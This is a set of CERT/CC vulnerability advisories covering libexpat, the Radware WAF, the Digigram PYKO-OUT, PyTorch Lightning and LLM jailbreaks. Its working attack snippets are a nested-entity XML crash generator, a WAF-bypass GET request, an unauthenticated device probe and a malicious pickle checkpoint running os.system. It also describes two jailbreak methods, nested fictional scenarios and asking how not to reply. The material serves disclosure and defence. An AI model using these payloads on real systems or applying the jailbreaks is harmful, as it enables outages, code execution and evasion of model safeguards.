-
VU#760160: libexpat library is vulnerable to DoS attacks through stack overflow
Overview
A stack overflow vulnerability has been discovered within the libexpat open source library. When parsing XML documents with deeply nested entity references, libexpat can recurse indefinitely, exhausting stack space and causing a crash. An attacker can exploit this to perform denial of service (DoS) attacks or, depending on the environment and library usage, memory corruption attacks.
Description
libexpat is an open source, stream-oriented XML parsing library written in the C programming language. Its streaming design makes it particularly useful for large files that are difficult to process entirely in RAM. A vulnerability has been discovered, tracked as CVE-2024-8176. The vulnerability description can be observed below.
CVE-2024-8176
A stack overflow vulnerability exists in the libexpat library due to the way it handles recursive entity expansion in XML documents. When parsing an XML document with deeply nested entity references, libexpat can be forced to recurse indefinitely, exhausting the stack space and causing a crash. This issue could lead to denial of service (DoS) or, in some cases, exploitable memory corruption, depending on the environment and library usage.
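As a rough illustration of the document shape involved (this sketch is not taken from the advisory or the linked payload generators; the depth value and file name are arbitrary), a chain of internal entities in which each entity references the previous one forces one level of recursive expansion per entity when the final entity is used:

    # Generate an XML document with a deep chain of nested internal entity
    # references of the kind described in CVE-2024-8176. Expanding the last
    # entity requires one level of recursion per entity in the chain.
    def nested_entity_payload(depth: int = 50000) -> str:
        entities = ['<!ENTITY e0 "x">']
        for i in range(1, depth):
            entities.append(f'<!ENTITY e{i} "&e{i - 1};">')
        dtd = "\n".join(entities)
        return (
            '<?xml version="1.0"?>\n'
            f'<!DOCTYPE doc [\n{dtd}\n]>\n'
            f'<doc>&e{depth - 1};</doc>\n'
        )

    if __name__ == "__main__":
        # Writing the payload to disk is enough to show the structure; feeding
        # it to an unpatched libexpat build (for example through Python's
        # xml.parsers.expat binding) may exhaust the stack, depending on the
        # platform's stack limits.
        with open("nested_entities.xml", "w") as f:
            f.write(nested_entity_payload())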
Impact
An attacker with access to software that uses libexpat could provide an XML document to the program and cause a denial of service or memory corruption. libexpat is embedded in a wide variety of software from many vendors.
Solution
A patch for the vulnerability has been provided in version 2.7.0 of libexpat. Organizations that use libexpat can verify the patch using the proof-of-concept payload generators provided here: https://github.com/libexpat/libexpat/issues/893#payload_generators
Acknowledgements
This vulnerability was reported to us by the maintainer of the project, Sebastian Pipping, to increase awareness. The vulnerability was originally discovered by Jann Horn of Google's Project Zero. Vendors who wish to join the discussion within VINCE can do so here: https://www.kb.cert.org/vince/. This document was written by Christopher Cullen.
-
VU#722229: Radware Cloud Web Application Firewall Vulnerable to Filter Bypass
Overview
The Radware Cloud Web Application Firewall is vulnerable to filter bypass by multiple means. The first is via a specially crafted HTTP request, and the second stems from insufficient validation of user-supplied input when processing a special character. An attacker with knowledge of these vulnerabilities can perform additional attacks without interference from the firewall.
Description
The Radware Cloud Web Application Firewall can be bypassed by means of a crafted HTTP request. If random data is included in the request body of an HTTP GET request, WAF protections may be bypassed. Note that this evasion is only possible for requests that use the HTTP GET method.
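As a rough sketch of this first bypass (the URL and query payload below are hypothetical and not taken from the report), the technique amounts to attaching arbitrary data to the body of a GET request so that the rest of the request may pass the WAF unfiltered:

    # Hypothetical illustration of a GET request that carries random filler
    # data in its body; the query string holds the payload that the WAF would
    # normally be expected to block.
    import os

    import requests

    target = "https://app.example.com/search"   # hypothetical protected application
    params = {"q": "' OR '1'='1"}               # placeholder payload, for illustration only
    filler = os.urandom(4096).hex()             # random data placed in the GET body

    response = requests.get(target, params=params, data=filler, timeout=10)
    print(response.status_code)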
Another way the Radware Cloud WAF can be bypassed is if an attacker adds a special character to the request. The firewall fails to filter these requests and allows for various payloads to reach the underlying web application.
Impact
An attacker with knowledge of these vulnerabilities can bypass filtering. This allows malicious inputs to reach the underlying web application.
Solution
The vulnerabilities appear to have been fixed; however, Radware did not acknowledge the reporter's findings when they were initially disclosed.
Acknowledgements
Thanks to Oriol Gegundez for reporting this issue. This document was written by Kevin Stephens and Ben Koo.
-
VU#360686: Digigram PYKO-OUT audio-over-IP (AoIP) does not require a password by default
Overview
Digigram's PYKO-OUT audio-over-IP (AoIP) product is used for audio decoding and is intended for various uses such as paging, background music, and live announcements. The hardware provides two analog mono outputs and a USB port for storing local playlists. The product does not require a password by default, and when exposed to the Internet it can allow attackers access to the device, from which they can pivot to attacking adjacent connected devices or compromise the device's functionality.
Description
Digigram is an audio-based hardware and software vendor, providing various products including sound cards, AoIP gateways, and speaker-related support software. Digigram sells a PYKO-OUT audio-over-IP product that is used for audio decoding and intended for various uses such as paging, background music, and live announcements.
A vulnerability has been discovered within the web server component of the PYKO-OUT AoIP device: the default configuration does not require any login credentials or password. The web server listens on 192.168.0.100 by default. The lack of credentials allows any attacker who discovers the device's IP address to connect to and manipulate it without any authentication or authorization.
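A minimal sketch of what discovering such a device looks like (the default address comes from this note; the request path and the interpretation of the response are assumptions for illustration only):

    # Probe the PYKO-OUT web interface without supplying any credentials.
    import requests

    device = "http://192.168.0.100/"   # factory-default address noted above

    try:
        resp = requests.get(device, timeout=5)
        if resp.status_code in (401, 403):
            print("device prompts for credentials")
        else:
            # A normal page returned to an unauthenticated request suggests the
            # factory-default (no password) configuration is still in place.
            print(f"HTTP {resp.status_code}: no authentication prompt observed")
    except requests.RequestException as exc:
        print("device unreachable:", exc)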
An attacker who gains access to the device can access its configuration, control audio outputs and inputs, and potentially pivot to other connected devices, whether through network connections or by placing malicious files on a connected USB device.
Impact
An attacker with access to a vulnerable device can access the device's configuration, control audio-over-IP data streams managed by the device, and pivot to other network-connected and physically connected devices, such as through a connected USB thumb drive.
Solution
Digigram has marked this product as EOL and will not be providing a patch to change the default configuration. Users can alter the password settings within the web server UI and force attempted connections to provide a password. Additionally, the product is no longer being sold by Digigram.
Acknowledgements
Thanks to the reporter, Souvik Kandar. Additional thanks to CERT-FR. This document was written by Christopher Cullen.
-
VU#667211: Various GPT services are vulnerable to two systemic jailbreaks, allowing for bypass of safety guardrails
Overview
Two systemic jailbreaks, affecting a number of generative AI services, were discovered. These jailbreaks can result in the bypass of safety protocols and allow an attacker to instruct the corresponding LLM to provide illicit or dangerous content. The first jailbreak, called “Inception,” is facilitated by prompting the AI to imagine a fictitious scenario, which can then be adapted into a second scenario in which the AI acts as though it has no safety guardrails. The second jailbreak is facilitated by asking the AI how it should not reply to a specific request.
Both jailbreaks, when provided to multiple AI models, will result in a safety guardrail bypass with almost the exact same syntax. This indicates a systemic weakness within many popular AI systems.
Description
Two systemic jailbreaks, affecting several generative AI services, have been discovered. These jailbreaks, when performed against AI services with the exact same syntax, result in a bypass of safety guardrails on affected systems.
The first jailbreak is facilitated by prompting the AI to imagine a fictitious scenario, which can then be adapted into a second scenario nested within the first. Continued prompting within the second scenario's context can result in a bypass of safety guardrails and allow the generation of malicious content. This jailbreak, named “Inception” by the reporter, affects the following vendors:
- ChatGPT (OpenAI)
- Claude (Anthropic)
- DeepSeek
- Gemini (Google)
- Grok (Twitter/X)
- MetaAI (Facebook)
- MistralAI
The second jailbreak is facilitated by prompting the AI to describe how it should not reply to a request within a certain context. The AI can then be further prompted to respond as normal, and the attacker can pivot back and forth between illicit questions that bypass safety guardrails and normal prompts. This jailbreak affects the following vendors:
- ChatGPT
- Claude
- DeepSeek
- Gemini
- Grok
- MistralAI
Impact
These jailbreaks, while of low severity on their own, bypass the security and safety guidelines of all affected AI services, allowing an attacker to abuse them to obtain instructions or content on various illicit topics, such as controlled substances, weapons, phishing emails, and malware code generation.
A motivated threat actor could exploit these jailbreaks to achieve a variety of malicious actions. The systemic nature of the jailbreaks heightens the risk of such an attack. Additionally, legitimate services such as those affected can function as a proxy, hiding a threat actor's malicious activity.
Solution
Various affected vendors have provided statements on the issue and have altered services to prevent the jailbreak.
Acknowledgements
Thanks to the reporters, David Kuzsmar, who reported the first jailbreak, and Jacob Liddle, who reported the second jailbreak. This document was written by Christopher Cullen.
-
VU#252619: Multiple deserialization vulnerabilities in PyTorch Lightning 2.4.0 and earlier versions
Overview
PyTorch Lightning versions 2.4.0 and earlier do not use any verification mechanisms to ensure that model files are safe to load before loading them. Users of PyTorch Lightning should use caution when loading models from unknown or unmanaged sources.
Description
PyTorch Lightning, a high-level framework built on top of PyTorch, is designed to streamline deep learning model training, scaling, and deployment. PyTorch Lightning is widely used in AI research and production environments, often integrating with various cloud and distributed computing platforms to manage large-scale machine learning workloads.
PyTorch Lightning contains multiple vulnerabilities related to the deserialization of untrusted data (CWE-502). These vulnerabilities arise from the unsafe use of torch.load(), which is used to deserialize model checkpoints, configurations, and sometimes metadata. While torch.load() provides an optional weights_only=True parameter to mitigate the risks of loading arbitrary code, PyTorch Lightning does not require or enforce this safeguard as a principal security requirement for the product.
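To illustrate why unrestricted deserialization (CWE-502) is dangerous here (the file name and command below are hypothetical, and this is not code from PyTorch Lightning itself), a pickled checkpoint can carry an object whose __reduce__ method tells the unpickler to call an arbitrary function, so merely loading the file runs attacker-chosen code:

    import torch

    class MaliciousPayload:
        # pickle records the call returned by __reduce__; the class itself does
        # not need to exist on the victim's machine for the call to execute.
        def __reduce__(self):
            import os
            return (os.system, ("echo pwned",))

    # Produce a checkpoint file that embeds the call above.
    torch.save({"state_dict": MaliciousPayload()}, "checkpoint.ckpt")

    # Loading the file with torch.load("checkpoint.ckpt", weights_only=False),
    # the historical default behavior, executes the embedded command during
    # deserialization; weights_only=True rejects it instead.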
Kasimir Schulz of HiddenLayer identified and reported the following five vulnerabilities:
- The DeepSpeed integration in PyTorch Lightning loads optimizer states and model checkpoints without enforcing safe deserialization practices. It does not validate the integrity or origin of serialized data before passing it to torch.load(), allowing deserialization of arbitrary objects.
- The PickleSerializer class directly utilizes Python's pickle module to handle data serialization and deserialization. Since pickle inherently allows execution of embedded code during deserialization, any untrusted or manipulated input processed by this class can introduce security risks.
- The _load_distributed_checkpoint component is responsible for handling distributed training checkpoints. It processes model state data across multiple nodes, but it does not include safeguards to verify or restrict the content being deserialized.
- The _lazy_load function is designed to defer loading of model components for efficiency. However, it does not enforce security controls on the serialized input, allowing for the potential deserialization of unverified objects.
- The Cloud_IO module facilitates storage and retrieval of model files from local and remote sources. It provides multiple deserialization pathways, such as handling files from disk, from remote servers, and from in-memory byte streams, without applying constraints on how the serialized data is interpreted.
Impact
A user could unknowingly load a malicious file from local or remote locations containing embedded code that executes within the system’s context, potentially leading to full system compromise.
Solution
To reduce the risk of deserialization-based vulnerabilities in PyTorch Lightning, users and organizations can implement the following mitigations at the system and operational levels:
- Verify that files to be loaded are from trusted sources and with valid signatures;
- Use sandbox environments to contain the effects of arbitrary code execution when untrusted models or files are being used or tested;
- Perform static and dynamic analysis of files to be loaded to verify that the ensuing operations will remain restricted to the data processing needs of the environment;
- Disable unnecessary deserialization features by ensuring that torch.load() is always used with weights_only=True when the files to be loaded are model weights (see the sketch after this list).
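A minimal sketch of the last mitigation (the file name and helper function are hypothetical, not part of the PyTorch Lightning API):

    import torch

    def load_weights_safely(path: str):
        # weights_only=True restricts deserialization to tensors and plain
        # containers; objects that would require running arbitrary reducers
        # raise an UnpicklingError instead of being executed.
        return torch.load(path, map_location="cpu", weights_only=True)

    state_dict = load_weights_safely("model_weights.ckpt")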
We have not received a statement from Lightning AI at this time. Please check the Vendor Information section for updates as they become available.
Acknowledgements
Thanks to the reporter, Kasimir Schulz [kschulz@hiddenlayer.com] from HiddenLayer. Thanks to Matt Churilla for verifying the vulnerabilities. This document was written by Renae Metcalf, Vijay Sarvepalli, and Eric Hatleback.